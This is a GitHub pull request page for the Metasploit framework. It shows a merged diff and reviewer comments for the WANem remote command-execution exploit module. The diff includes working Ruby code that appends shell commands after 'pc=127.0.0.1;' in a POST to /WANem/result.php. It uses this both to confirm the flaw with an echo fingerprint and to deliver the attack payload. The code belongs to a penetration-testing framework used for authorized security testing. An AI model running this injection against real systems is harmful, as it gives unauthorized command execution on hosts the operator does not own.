Skip to content

Loading…

check function test vulnerability + minor improvements #774

Merged
merged 1 commit into from

3 participants

@jvazquez-r7
  • Check function now test vulnerability by injecting a "echo" and looking at the response.
  • Minor fixes like using Rex::Text.uri_encode
  • I've asked for OSVDB numbers, we can wait to merge until OSVDB numbers available.
@bcoles

All good improvements. Works for me.

You're correct - Privileged => true should be false - I simply misunderstood the purpose of this property.

I didn't include an echo in the check on the flimsy pretense of legality. ie, 127.0.0.1 is "legitimate use" however 127.0.0.1; echo anything is arguably "unauthorized use". In hindsight this was unnecessary reasoning.

@wchen-r7

I generally favor explicit checks, but I also understand bcoles' concern. If you want, please feel free to submit another pull request to update the module again to see which one suits best. Weekly release cuts today, so I'll push this in framework for now -- looks acceptable.

@wchen-r7 wchen-r7 merged commit 37c7f36 into rapid7:master
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Commits on Sep 8, 2012
  1. check function test vulnerability + minor improvements

    jvazquez-r7 committed
Showing with 21 additions and 11 deletions.
  1. +21 −11 modules/exploits/linux/http/wanem_exec.rb
View
32 modules/exploits/linux/http/wanem_exec.rb
@@ -25,7 +25,6 @@ def initialize(info = {})
and vulnerable to command execution in argument one.
},
'License' => MSF_LICENSE,
- 'Version' => '$Revision: 1 $',
'Privileged' => true,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
@@ -42,7 +41,7 @@ def initialize(info = {})
'Payload' =>
{
'Space' => 1024,
- 'BadChars' => "\x00",
+ 'BadChars' => "\x00\x22\x27",
'DisableNops' => true,
'Compat' =>
{
@@ -68,24 +67,35 @@ def on_new_session(client)
end
def check
+ @peer = "#{rhost}:#{rport}"
+ fingerprint = Rex::Text.rand_text_alphanumeric(rand(8)+4)
+ data = "pc=127.0.0.1; "
+ data << Rex::Text.uri_encode("echo #{fingerprint}")
+ data << "%26"
+ print_status("#{@peer} - Sending check")
- res = send_request_cgi({
- 'method' => 'GET',
- 'uri' => '/WANem/result.php'
- })
- if res and res.body =~ /<br><br><br><b><font color=red>Can't measure\!\! Please repeat\.<\/font><\/b><\/body>/
- return Exploit::CheckCode::Appears
+ begin
+ res = send_request_cgi({
+ 'uri' => '/WANem/result.php',
+ 'method' => 'POST',
+ 'data' => data
+ }, 25)
+ rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+ print_error("#{@peer} - Connection failed")
+ return Exploit::CheckCode::Unknown
+ end
+
+ if res and res.code == 200 and res.body =~ /#{fingerprint}/
+ return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
-
end
def exploit
-
@peer = "#{rhost}:#{rport}"
data = "pc=127.0.0.1; "
- data << URI.encode(payload.raw)
+ data << Rex::Text.uri_encode(payload.raw)
data << "%26"
print_status("#{@peer} - Sending payload (#{payload.raw.length} bytes)")
begin
Something went wrong with that request. Please try again.